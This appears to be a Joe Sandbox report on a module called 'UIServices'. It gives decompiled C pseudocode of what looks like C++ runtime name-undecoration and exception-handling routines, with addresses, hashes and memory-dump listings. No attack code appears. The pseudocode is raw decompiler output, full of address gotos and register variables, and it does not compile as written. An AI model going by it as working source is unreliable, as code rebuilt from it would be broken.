                                                    				r11d = r11d | 0xffffffff;
                                                    				_t74 =  *_t132;
                                                    				if (_t74 == 0) goto 0x2356db4c;
                                                    				_t88 = _t74 -  *_t110;
                                                    				if (_t88 != 0) goto 0x2356db4c;
                                                    				r8d = r8d + r11d;
                                                    				if (_t88 != 0) goto 0x2356db37;
                                                    				if (( *(_t132 + 1) & 0x000000ff) != ( *(_t110 + 1) & 0x000000ff)) goto 0x2356db6a;
                                                    				 *((intOrPtr*)(_t166 - 0x21)) = 0x14;
                                                    				_t177 = _t176 + 0x13;
                                                    				goto 0x2356dbaf;
                                                    				_t113 = "generic-type-";
                                                    				_t134 = _t177;
                                                    				r8d = 0xc;
                                                    				_t75 =  *_t134;
                                                    				if (_t75 == 0) goto 0x2356db8f;
                                                    				_t91 = _t75 -  *_t113;
                                                    				if (_t91 != 0) goto 0x2356db8f;
                                                    				r8d = r8d + r11d;
                                                    				if (_t91 != 0) goto 0x2356db7a;
                                                    				if (( *(_t134 + 1) & 0x000000ff) != ( *(_t113 + 1) & 0x000000ff)) goto 0x2356dc9a;
                                                    				 *((intOrPtr*)(_t166 - 0x21)) = 0xe;
                                                    				_t178 = _t177 + 0xd;
                                                    				 *((long long*)(_t166 - 0x29)) = "`generic-type-";
                                                    				asm("movaps xmm0, [ebp-0x29]");
                                                    				asm("movdqa [ebp-0x9], xmm0");
                                                    				 *0x23574360 = _t178;
                                                    				E00007FFC7FFC2356C270( !=  ? _t186 : 0x23571ac0, _t166 - 0x29, __rcx, _t162, _t171, __r10, _t181, __rcx);
                                                    				if (( *0x23574370 & 0x00004000) == 0) goto 0x2356dc77;
                                                    				_t124 =  *0x23574378; // 0x0
                                                    				if (_t124 == 0) goto 0x2356dc77;
                                                    				_t137 =  *((intOrPtr*)(_t166 - 0x29));
                                                    				if (_t137 == 0) goto 0x2356dc16;
                                                    				 *0x235701a0();
                                                    				 *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x18)))) = r15b;
                                                    				_t125 =  *0x23574378; // 0x0
                                                    				goto 0x2356dc1a;
                                                    				 *((intOrPtr*)(_t166 + 0x27)) = r15b;
                                                    				atol(_t186);
                                                    				_t118 = _t125;
                                                    				 *0x235701a0();
                                                    				if (_t118 == 0) goto 0x2356dc48;
                                                    				r8b = r15b;
                                                    				E00007FFC7FFC235669EC(_t166 - 0x29, _t118);
                                                    				goto 0x2356dcca;
                                                    				E00007FFC7FFC23566CF4(_t118, _t166 + 0x17, _t166 - 9);
                                                    				E00007FFC7FFC23566F74(_t118, _t166 - 9, _t166 - 0x29);
                                                    				r8b = 0x27;
                                                    				E00007FFC7FFC23566FA0(_t166 - 9, _t166 + 7);
                                                    				goto 0x2356dcca;
                                                    				E00007FFC7FFC23566CF4(_t118, _t166 + 7, _t166 - 9);
                                                    				E00007FFC7FFC23566F74(_t118, _t166 - 9, _t166 - 0x29);
                                                    				goto 0x2356dc69;
                                                    				if (r10b == 0) goto 0x2356dcb7;
                                                    				if ( *_t178 != 0x40) goto 0x2356dcb7;
                                                    				 *0x23574360 = _t178 + 1;
                                                    				goto 0x2356dcd0;
                                                    				r8b = 0x40;
                                                    				E00007FFC7FFC23566C44(_t118, _t186, _t166 + 7, 0x23574360, _t162, _t183);
                                                    				_t127 =  *_t118;
                                                    				_t82 =  *((intOrPtr*)(_t118 + 8));
                                                    				if (sil == 0) goto 0x2356dd0f;
                                                    				_t163 =  *0x23574350; // 0x0
                                                    				if ( *_t163 == 9) goto 0x2356dd0f;
                                                    				if (_t127 == 0) goto 0x2356dd0f;
                                                    				E00007FFC7FFC2356AA78(_t118, _t127, 0x23574388, 0x23574360, _t163, _t165);
                                                    				if (_t118 == 0) goto 0x2356dd0f;
                                                    				 *_t118 = _t127;
                                                    				 *((intOrPtr*)(_t118 + 8)) = _t82;
                                                    				_t159 =  *_t163;
                                                    				 *_t163 = _t159 + 1;
                                                    				 *((long long*)(_t163 + 0x10 + _t159 * 8)) = _t118;
                                                    				 *_t184 = _t127;
                                                    				 *((intOrPtr*)(_t184 + 8)) = _t82;
                                                    				return E00007FFC7FFC2356F5B0(_t159 + 1, _t184,  *(_t166 + 0x37) ^ _t168 - 0x00000090, _t159);
                                                    			}





































                                                    0x7ffc2356da5c
                                                    0x7ffc2356da5c
                                                    0x7ffc2356da5c
                                                    0x7ffc2356da5c
                                                    0x7ffc2356da5f
                                                    0x7ffc2356da63
                                                    0x7ffc2356da67
                                                    0x7ffc2356da70
                                                    0x7ffc2356da7b
                                                    0x7ffc2356da85
                                                    0x7ffc2356da89
                                                    0x7ffc2356da90
                                                    0x7ffc2356da93
                                                    0x7ffc2356da96
                                                    0x7ffc2356da99
                                                    0x7ffc2356da9d
                                                    0x7ffc2356daa5
                                                    0x7ffc2356daa7
                                                    0x7ffc2356daad
                                                    0x7ffc2356dab4
                                                    0x7ffc2356dabb
                                                    0x7ffc2356dac0
                                                    0x7ffc2356dac5
                                                    0x7ffc2356dacc
                                                    0x7ffc2356dad4
                                                    0x7ffc2356dadf
                                                    0x7ffc2356dae8
                                                    0x7ffc2356daeb
                                                    0x7ffc2356daf5
                                                    0x7ffc2356db05
                                                    0x7ffc2356db12
                                                    0x7ffc2356db1a
                                                    0x7ffc2356db1e
                                                    0x7ffc2356db23
                                                    0x7ffc2356db2a
                                                    0x7ffc2356db2d
                                                    0x7ffc2356db33
                                                    0x7ffc2356db37
                                                    0x7ffc2356db3b
                                                    0x7ffc2356db3d
                                                    0x7ffc2356db3f
                                                    0x7ffc2356db47
                                                    0x7ffc2356db4a
                                                    0x7ffc2356db54
                                                    0x7ffc2356db5d
                                                    0x7ffc2356db64
                                                    0x7ffc2356db68
                                                    0x7ffc2356db6a
                                                    0x7ffc2356db71
                                                    0x7ffc2356db74
                                                    0x7ffc2356db7a
                                                    0x7ffc2356db7e
                                                    0x7ffc2356db80
                                                    0x7ffc2356db82
                                                    0x7ffc2356db8a
                                                    0x7ffc2356db8d
                                                    0x7ffc2356db97
                                                    0x7ffc2356dba4
                                                    0x7ffc2356dbab
                                                    0x7ffc2356dbaf
                                                    0x7ffc2356dbb7
                                                    0x7ffc2356dbbb
                                                    0x7ffc2356dbc0
                                                    0x7ffc2356dbc7
                                                    0x7ffc2356dbd6
                                                    0x7ffc2356dbdc
                                                    0x7ffc2356dbe6
                                                    0x7ffc2356dbec
                                                    0x7ffc2356dbf3
                                                    0x7ffc2356dc04
                                                    0x7ffc2356dc0a
                                                    0x7ffc2356dc0d
                                                    0x7ffc2356dc14
                                                    0x7ffc2356dc16
                                                    0x7ffc2356dc1e
                                                    0x7ffc2356dc26
                                                    0x7ffc2356dc29
                                                    0x7ffc2356dc32
                                                    0x7ffc2356dc34
                                                    0x7ffc2356dc3e
                                                    0x7ffc2356dc43
                                                    0x7ffc2356dc50
                                                    0x7ffc2356dc60
                                                    0x7ffc2356dc69
                                                    0x7ffc2356dc70
                                                    0x7ffc2356dc75
                                                    0x7ffc2356dc7f
                                                    0x7ffc2356dc8f
                                                    0x7ffc2356dc98
                                                    0x7ffc2356dc9d
                                                    0x7ffc2356dca3
                                                    0x7ffc2356dcab
                                                    0x7ffc2356dcb5
                                                    0x7ffc2356dcb7
                                                    0x7ffc2356dcc5
                                                    0x7ffc2356dcca
                                                    0x7ffc2356dccd
                                                    0x7ffc2356dcd3
                                                    0x7ffc2356dcd5
                                                    0x7ffc2356dcdf
                                                    0x7ffc2356dce4
                                                    0x7ffc2356dcf2
                                                    0x7ffc2356dcfa
                                                    0x7ffc2356dcfc
                                                    0x7ffc2356dcff
                                                    0x7ffc2356dd02
                                                    0x7ffc2356dd08
                                                    0x7ffc2356dd0a
                                                    0x7ffc2356dd0f
                                                    0x7ffc2356dd12
                                                    0x7ffc2356dd41

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                    • API String ID: 0-3207858774
                                                    • Opcode ID: 928b87780ea1a29b4cb16e692e2e24247bd2f1f6e829132aeb6cd054b6efe0a7
                                                    • Instruction ID: 1c4326a6d11c89b414f01bed578256944f5996e8012b4c78ebf96bca7a929e61
                                                    • Opcode Fuzzy Hash: 928b87780ea1a29b4cb16e692e2e24247bd2f1f6e829132aeb6cd054b6efe0a7
                                                    • Instruction Fuzzy Hash: AB917B62F08AAE85FB11CF22D8402B827F1EB94744F8845B6DA4D277A5DF3CE545CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 80%
                                                    			E00007FFC7FFC23569D44(void* __ecx, void* __edx, long long __rbx, long long* __rcx, long long __rdi, void* __r8, long long __r9, long long _a8, long long _a24) {
                                                    				void* _v8;
                                                    				char _v24;
                                                    				char _v56;
                                                    				intOrPtr _v64;
                                                    				void* _v72;
                                                    				intOrPtr _t28;
                                                    				void* _t29;
                                                    				void* _t30;
                                                    				void* _t31;
                                                    				void* _t33;
                                                    				char* _t46;
                                                    				long long* _t48;
                                                    				long long* _t52;
                                                    				void* _t54;
                                                    				void* _t59;
                                                    				void* _t61;
                                                    				void* _t62;
                                                    				void* _t64;
                                                    				void* _t65;
                                                    
                                                    				_t59 = __r8;
                                                    				_t38 = __rbx;
                                                    				_t30 = __edx;
                                                    				_t29 = __ecx;
                                                    				_a8 = __rbx;
                                                    				_a24 = __rdi;
                                                    				_t46 =  *0x23574360; // 0x0
                                                    				r9d = 0;
                                                    				_t52 = __rcx;
                                                    				r8d =  *_t46;
                                                    				if (r8b != 0) goto 0x23569da7;
                                                    				_t35 = "`unknown ecsu\'";
                                                    				_v64 = 0xe;
                                                    				_v72 = "`unknown ecsu\'";
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x30], xmm0");
                                                    				E00007FFC7FFC23566CF4("`unknown ecsu\'",  &_v72,  &_v56);
                                                    				r8d = 1;
                                                    				_t48 = __rcx;
                                                    				E00007FFC7FFC23566FCC(_t35, __rcx);
                                                    				goto 0x23569e01;
                                                    				_v72 = __r9;
                                                    				_v64 = r9d;
                                                    				_t33 = r8b - 0x57;
                                                    				if (_t33 != 0) goto 0x23569e16;
                                                    				if (_t33 != 0) goto 0x23569e2d;
                                                    				 *0x23574360 = _t48 + 1;
                                                    				if (r8b != 0x57) goto 0x23569dde;
                                                    				E00007FFC7FFC23569F24(_t30, _t31, __rbx,  &_v24, _t52, _t54);
                                                    				E00007FFC7FFC2356C134(_t29, _t31, _t35, _t38,  &_v56, _t48 + 1, _t52, _t54, _t59, _t61, _t62, _t64, _t65);
                                                    				E00007FFC7FFC23567078(_t29,  &_v72,  &_v56, _t59);
                                                    				 *_t52 = _v72;
                                                    				_t28 = _v64;
                                                    				 *((intOrPtr*)(_t52 + 8)) = _t28;
                                                    				return _t28;
                                                    			}






















                                                    0x7ffc23569d44
                                                    0x7ffc23569d44
                                                    0x7ffc23569d44
                                                    0x7ffc23569d44
                                                    0x7ffc23569d44
                                                    0x7ffc23569d49
                                                    0x7ffc23569d56
                                                    0x7ffc23569d5d
                                                    0x7ffc23569d60
                                                    0x7ffc23569d63
                                                    0x7ffc23569d6a
                                                    0x7ffc23569d6c
                                                    0x7ffc23569d73
                                                    0x7ffc23569d7a
                                                    0x7ffc23569d82
                                                    0x7ffc23569d8a
                                                    0x7ffc23569d8f
                                                    0x7ffc23569d94
                                                    0x7ffc23569d9a
                                                    0x7ffc23569da0
                                                    0x7ffc23569da5
                                                    0x7ffc23569da7
                                                    0x7ffc23569dab
                                                    0x7ffc23569daf
                                                    0x7ffc23569db3
                                                    0x7ffc23569dc3
                                                    0x7ffc23569dc8
                                                    0x7ffc23569dd3
                                                    0x7ffc23569dd9
                                                    0x7ffc23569de2
                                                    0x7ffc23569def
                                                    0x7ffc23569df8
                                                    0x7ffc23569dfb
                                                    0x7ffc23569dfe
                                                    0x7ffc23569e15

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$Name::operator+=
                                                    • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                    • API String ID: 179159573-1464470183
                                                    • Opcode ID: bf3689c0f9cd75041bb0a8ea9a574fd0039b8fb0237401dcbb7bc633705ecfd6
                                                    • Instruction ID: 3a48a1a3a0fadf592f9cdadb2bb835568b62d0d2d4b5df32d4bbc0bc435815c4
                                                    • Opcode Fuzzy Hash: bf3689c0f9cd75041bb0a8ea9a574fd0039b8fb0237401dcbb7bc633705ecfd6
                                                    • Instruction Fuzzy Hash: 6D513972F18A2A89FB14CB65EC545BC77B4FB04388F500179DE0D66A59DF38E545CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 76%
                                                    			E00007FFC7FFC23568558(void* __ecx, void* __edx, void* __edi, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                    				void* _v24;
                                                    				char _v40;
                                                    				char _v56;
                                                    				char _v72;
                                                    				intOrPtr _v80;
                                                    				char _v88;
                                                    				intOrPtr _v96;
                                                    				char _v104;
                                                    				char _v112;
                                                    				char _v120;
                                                    				void* __r14;
                                                    				void* _t66;
                                                    				void* _t88;
                                                    				void* _t90;
                                                    				void* _t98;
                                                    				intOrPtr* _t106;
                                                    				intOrPtr* _t108;
                                                    				intOrPtr* _t146;
                                                    				intOrPtr* _t155;
                                                    				long long* _t158;
                                                    				void* _t169;
                                                    				void* _t170;
                                                    				void* _t172;
                                                    				long long _t173;
                                                    
                                                    				_t112 = __rbx;
                                                    				_t90 = __edx;
                                                    				_t88 = __ecx;
                                                    				_a8 = __rbx;
                                                    				_a16 = __rsi;
                                                    				_a24 = __rdi;
                                                    				_t106 =  *0x23574360; // 0x0
                                                    				r15d = 0;
                                                    				_t155 = __rdx;
                                                    				_t158 = __rcx;
                                                    				if ( *_t106 == r15b) goto 0x235686d3;
                                                    				_t66 = E00007FFC7FFC2356AB6C(__rdx);
                                                    				r14d = _t66;
                                                    				_t98 = _t66;
                                                    				if (_t98 < 0) goto 0x2356873f;
                                                    				if (_t98 == 0) goto 0x2356873f;
                                                    				_v120 = _t173;
                                                    				_v112 = r15d;
                                                    				if (( *(__rdx + 8) & 0x00000800) == 0) goto 0x235685e0;
                                                    				_v96 = 2;
                                                    				_v104 = 0x23570ea0;
                                                    				asm("movaps xmm0, [ebp-0x50]");
                                                    				asm("movdqa [ebp-0x50], xmm0");
                                                    				E00007FFC7FFC23566FF8(_t90, __edi, 0x23570ea0, __rbx,  &_v120,  &_v104, _t158);
                                                    				goto 0x23568643;
                                                    				r14d = r14d - 1;
                                                    				if (r14d == 0) goto 0x23568649;
                                                    				_t108 =  *0x23574360; // 0x0
                                                    				if ( *_t108 == r15b) goto 0x23568649;
                                                    				E00007FFC7FFC23569BAC(0, _t112,  &_v56, _t155, _t158, _t169, _t170, _t172);
                                                    				_v104 = _t173;
                                                    				_v96 = r15d;
                                                    				_t113 = _t108;
                                                    				E00007FFC7FFC23568150(0x5b, _t108, _t108,  &_v104);
                                                    				E00007FFC7FFC23566F74( &_v104,  &_v72, _t108);
                                                    				r8b = 0x5d;
                                                    				E00007FFC7FFC23566FA0( &_v72,  &_v40);
                                                    				E00007FFC7FFC23567078(_t88,  &_v120, _t108, _t113);
                                                    				if (_v112 - 1 <= 0) goto 0x235685e0;
                                                    				if ( *_t155 == _t173) goto 0x235686b0;
                                                    				if (( *(_t155 + 8) & 0x00000800) == 0) goto 0x23568660;
                                                    				goto 0x2356869a;
                                                    				_v104 = _t173;
                                                    				_v96 = r15d;
                                                    				E00007FFC7FFC23568150(0x28, _t108, _t113,  &_v104);
                                                    				E00007FFC7FFC23566F74( &_v104,  &_v72, _t155);
                                                    				r8b = 0x29;
                                                    				E00007FFC7FFC23566FA0( &_v72,  &_v40);
                                                    				E00007FFC7FFC23566F74(_t108,  &_v56,  &_v120);
                                                    				_v120 =  *_t108;
                                                    				_v112 =  *((intOrPtr*)(_t108 + 8));
                                                    				_t146 =  &_v120;
                                                    				E00007FFC7FFC2356B428(0x28, __edi, _t108, _t113,  &_v88, _t146, _t155, _t158,  &_v120, _t172);
                                                    				asm("bts ecx, 0xb");
                                                    				 *((intOrPtr*)(_t158 + 8)) = _v80;
                                                    				 *_t158 = _v88;
                                                    				goto 0x2356877f;
                                                    				if ( *_t146 == _t173) goto 0x2356873f;
                                                    				_t110 = ")[";
                                                    				_v80 = 2;
                                                    				_v88 = ")[";
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x30], xmm0");
                                                    				_v104 = _t173;
                                                    				_v96 = r15d;
                                                    				E00007FFC7FFC23568150(0x28, ")[", _t113,  &_v104);
                                                    				E00007FFC7FFC23566F74( &_v104,  &_v88, _t155);
                                                    				E00007FFC7FFC23566F48( &_v88,  &_v40,  &_v72);
                                                    				r8d = 1;
                                                    				E00007FFC7FFC23566FCC(")[",  &_v56);
                                                    				goto 0x23568769;
                                                    				_v104 = _t173;
                                                    				_v96 = r15d;
                                                    				E00007FFC7FFC23568150(0x5b, _t110, _t113,  &_v104);
                                                    				r8d = 1;
                                                    				E00007FFC7FFC23566FCC( &_v104,  &_v40);
                                                    				r8b = 0x5d;
                                                    				E00007FFC7FFC23566FA0(_t110,  &_v56);
                                                    				return E00007FFC7FFC23568898(0x5b, __edi, _t113, _t158, _t110, _t155, _t158, _t172);
                                                    			}



























                                                    0x7ffc23568558
                                                    0x7ffc23568558
                                                    0x7ffc23568558
                                                    0x7ffc23568558
                                                    0x7ffc2356855d
                                                    0x7ffc23568562
                                                    0x7ffc23568576
                                                    0x7ffc2356857d
                                                    0x7ffc23568580
                                                    0x7ffc23568583
                                                    0x7ffc23568589
                                                    0x7ffc2356858f
                                                    0x7ffc23568594
                                                    0x7ffc23568597
                                                    0x7ffc23568599
                                                    0x7ffc2356859f
                                                    0x7ffc235685ac
                                                    0x7ffc235685b0
                                                    0x7ffc235685b4
                                                    0x7ffc235685b6
                                                    0x7ffc235685c4
                                                    0x7ffc235685cc
                                                    0x7ffc235685d4
                                                    0x7ffc235685d9
                                                    0x7ffc235685de
                                                    0x7ffc235685e3
                                                    0x7ffc235685e8
                                                    0x7ffc235685ea
                                                    0x7ffc235685f4
                                                    0x7ffc235685fc
                                                    0x7ffc23568603
                                                    0x7ffc2356860b
                                                    0x7ffc2356860f
                                                    0x7ffc23568612
                                                    0x7ffc23568622
                                                    0x7ffc23568627
                                                    0x7ffc23568632
                                                    0x7ffc2356863e
                                                    0x7ffc23568647
                                                    0x7ffc2356864c
                                                    0x7ffc23568655
                                                    0x7ffc2356865e
                                                    0x7ffc23568662
                                                    0x7ffc2356866a
                                                    0x7ffc2356866e
                                                    0x7ffc2356867e
                                                    0x7ffc23568683
                                                    0x7ffc2356868e
                                                    0x7ffc2356869e
                                                    0x7ffc235686a6
                                                    0x7ffc235686ad
                                                    0x7ffc235686b0
                                                    0x7ffc235686b8
                                                    0x7ffc235686c4
                                                    0x7ffc235686c8
                                                    0x7ffc235686cb
                                                    0x7ffc235686ce
                                                    0x7ffc235686d6
                                                    0x7ffc235686d8
                                                    0x7ffc235686df
                                                    0x7ffc235686e6
                                                    0x7ffc235686ee
                                                    0x7ffc235686f4
                                                    0x7ffc235686f9
                                                    0x7ffc235686fd
                                                    0x7ffc23568701
                                                    0x7ffc23568711
                                                    0x7ffc23568722
                                                    0x7ffc23568727
                                                    0x7ffc23568734
                                                    0x7ffc2356873d
                                                    0x7ffc23568741
                                                    0x7ffc23568749
                                                    0x7ffc2356874d
                                                    0x7ffc23568752
                                                    0x7ffc23568760
                                                    0x7ffc23568769
                                                    0x7ffc2356876f
                                                    0x7ffc2356879e

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: 7c905d25df6533693e4543565a52052680a713f17b26df085205557a8d408556
                                                    • Instruction ID: cd0cabf44dadffab26bab23f869496e9bdfbf43e07e2554937b6e59f96ef6bfc
                                                    • Opcode Fuzzy Hash: 7c905d25df6533693e4543565a52052680a713f17b26df085205557a8d408556
                                                    • Instruction Fuzzy Hash: 14613672F14A6A98FB00DBA0EC801EC27B5FB44788B404476DE0D6BA99EF78D549CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1563 7ffc23562f2c-7ffc23562f94 call 7ffc2356e1e0 1566 7ffc23562fad-7ffc23562fb6 call 7ffc235664b0 1563->1566 1567 7ffc23562f96-7ffc23562f9f call 7ffc235664b0 1563->1567 1574 7ffc23562fcc-7ffc23562fcf 1566->1574 1575 7ffc23562fb8-7ffc23562fc5 call 7ffc235664b0 * 2 1566->1575 1572 7ffc23562fa5-7ffc23562fab 1567->1572 1573 7ffc235633e4-7ffc235633ea abort 1567->1573 1572->1574 1577 7ffc235633eb-7ffc2356340a call 7ffc2356f5b0 1573->1577 1574->1573 1576 7ffc23562fd5-7ffc23562fe1 1574->1576 1575->1574 1579 7ffc23562fe3-7ffc2356300a 1576->1579 1580 7ffc2356300c 1576->1580 1583 7ffc2356300e-7ffc23563010 1579->1583 1580->1583 1583->1573 1587 7ffc23563016-7ffc2356301c 1583->1587 1588 7ffc23563022-7ffc23563026 1587->1588 1589 7ffc235630e8-7ffc235630fe call 7ffc235640ec 1587->1589 1588->1589 1591 7ffc2356302c-7ffc23563037 1588->1591 1594 7ffc235633a0-7ffc235633a4 1589->1594 1595 7ffc23563104-7ffc23563108 1589->1595 1591->1589 1593 7ffc2356303d-7ffc23563042 1591->1593 1593->1589 1596 7ffc23563048-7ffc23563052 call 7ffc235664b0 1593->1596 1597 7ffc235633d8-7ffc235633e2 call 7ffc235664b0 1594->1597 1598 7ffc235633a6-7ffc235633ad 1594->1598 1595->1594 1599 7ffc2356310e-7ffc23563119 1595->1599 1596->1577 1609 7ffc23563058-7ffc2356307e call 7ffc235664b0 * 2 call 7ffc2356f084 1596->1609 1597->1573 1597->1577 1598->1573 1601 7ffc235633af-7ffc235633d3 call 7ffc23563648 1598->1601 1599->1594 1603 7ffc2356311f-7ffc23563123 1599->1603 1601->1597 1607 7ffc23563372-7ffc23563376 1603->1607 1608 7ffc23563129-7ffc23563160 call 7ffc2356ea68 1603->1608 1607->1597 1610 7ffc23563378-7ffc23563385 call 7ffc2356e798 1607->1610 1608->1607 1618 7ffc23563166-7ffc23563178 1608->1618 1632 7ffc23563080-7ffc23563084 1609->1632 1633 7ffc2356309e-7ffc235630a8 call 7ffc235664b0 1609->1633 1610->1597 1621 7ffc23563387-7ffc2356339f call 7ffc235664b0 * 2 terminate 1610->1621 1619 7ffc2356317c-7ffc2356318c 1618->1619 1623 7ffc235632d1-7ffc23563365 1619->1623 1624 7ffc23563192-7ffc23563198 1619->1624 1621->1594 1623->1619 1629 7ffc2356336b-7ffc23563370 1623->1629 1624->1623 1627 7ffc2356319e-7ffc235631c7 call 7ffc23564070 1624->1627 1638 7ffc235631cd-7ffc23563214 call 7ffc2356f058 * 2 1627->1638 1639 7ffc235632ca 1627->1639 1629->1597 1629->1607 1632->1633 1636 7ffc23563086-7ffc23563091 1632->1636 1633->1589 1643 7ffc235630aa-7ffc235630ca call 7ffc235664b0 * 2 call 7ffc23564e48 1633->1643 1636->1633 1640 7ffc23563093-7ffc23563098 1636->1640 1650 7ffc23563250-7ffc23563266 call 7ffc23564700 1638->1650 1651 7ffc23563216-7ffc2356323b call 7ffc2356f058 call 7ffc23563a78 1638->1651 1639->1623 1640->1573 1640->1633 1659 7ffc235630e3 1643->1659 1660 7ffc235630cc-7ffc235630d6 call 7ffc23564f38 1643->1660 1661 7ffc23563268 1650->1661 1662 7ffc235632c6 1650->1662 1667 7ffc2356326d-7ffc235632c1 call 7ffc23562970 1651->1667 1668 7ffc2356323d-7ffc23563249 1651->1668 1659->1589 1670 7ffc235630dc-7ffc235630e2 terminate 1660->1670 1671 7ffc2356340b-7ffc2356342f call 7ffc23562070 call 7ffc23564200 call 7ffc23566190 1660->1671 1661->1638 1662->1639 1667->1662 1668->1651 1669 7ffc2356324b 1668->1669 1669->1650 1670->1659
                                                    C-Code - Quality: 63%
                                                    			E00007FFC7FFC23562F2C(intOrPtr* __rcx, long long __rdx, void* __r8, void* __r9) {
                                                    				void* __rbx;
                                                    				void* __rdi;
                                                    				void* __rsi;
                                                    				void* __rbp;
                                                    				void* _t163;
                                                    				intOrPtr _t164;
                                                    				intOrPtr _t166;
                                                    				intOrPtr _t203;
                                                    				void* _t204;
                                                    				intOrPtr _t208;
                                                    				void* _t209;
                                                    				signed long long _t248;
                                                    				signed long long _t249;
                                                    				signed char _t250;
                                                    				intOrPtr* _t252;
                                                    				long long _t254;
                                                    				long long _t262;
                                                    				long long _t264;
                                                    				signed char* _t266;
                                                    				long long _t278;
                                                    				long long _t297;
                                                    				long long _t298;
                                                    				intOrPtr* _t299;
                                                    				void* _t302;
                                                    				void* _t303;
                                                    				void* _t304;
                                                    				void* _t305;
                                                    				signed long long _t306;
                                                    				long long _t323;
                                                    				long long _t325;
                                                    				signed char* _t326;
                                                    				intOrPtr _t331;
                                                    
                                                    				_t304 = _t305 - 0x88;
                                                    				_t306 = _t305 - 0x188;
                                                    				_t248 =  *0x23574038; // 0x61e4d8aad2e0
                                                    				_t249 = _t248 ^ _t306;
                                                    				 *(_t304 + 0x70) = _t249;
                                                    				_t326 =  *((intOrPtr*)(_t304 + 0xf0));
                                                    				 *((long long*)(_t306 + 0x78)) = __rdx;
                                                    				_t266 = _t326;
                                                    				 *((long long*)(_t304 - 0x60)) =  *((intOrPtr*)(_t304 + 0x108));
                                                    				_t303 = __r9;
                                                    				 *((char*)(_t306 + 0x60)) = 0;
                                                    				 *((char*)(_t306 + 0x61)) = 0;
                                                    				E00007FFC7FFC2356E1E0(_t266, __r9, __r9);
                                                    				if ( *((intOrPtr*)(__r9 + 0x48)) == 0) goto 0x23562fad;
                                                    				E00007FFC7FFC235664B0(_t249);
                                                    				if ( *((intOrPtr*)(_t249 + 0x78)) != 0xfffffffe) goto 0x235633e4;
                                                    				goto 0x23562fcc;
                                                    				E00007FFC7FFC235664B0(_t249);
                                                    				if ( *((intOrPtr*)(_t249 + 0x78)) == 0xfffffffe) goto 0x23562fcc;
                                                    				E00007FFC7FFC235664B0(_t249);
                                                    				_t208 =  *((intOrPtr*)(_t249 + 0x78));
                                                    				E00007FFC7FFC235664B0(_t249);
                                                    				 *((intOrPtr*)(_t249 + 0x78)) = 0xfffffffe;
                                                    				if (_t208 - 0xffffffff < 0) goto 0x235633e4;
                                                    				if (_t326[8] == 0) goto 0x2356300c;
                                                    				_t250 = _t266[0x7ffc23570410];
                                                    				goto 0x2356300e;
                                                    				if (_t208 >= 0) goto 0x235633e4;
                                                    				if ( *__rcx != 0xe06d7363) goto 0x235630e8;
                                                    				if ( *((intOrPtr*)(__rcx + 0x18)) != 4) goto 0x235630e8;
                                                    				if ( *((intOrPtr*)(__rcx + 0x20)) - 0x19930520 - 2 > 0) goto 0x235630e8;
                                                    				if ( *((long long*)(__rcx + 0x30)) != 0) goto 0x235630e8;
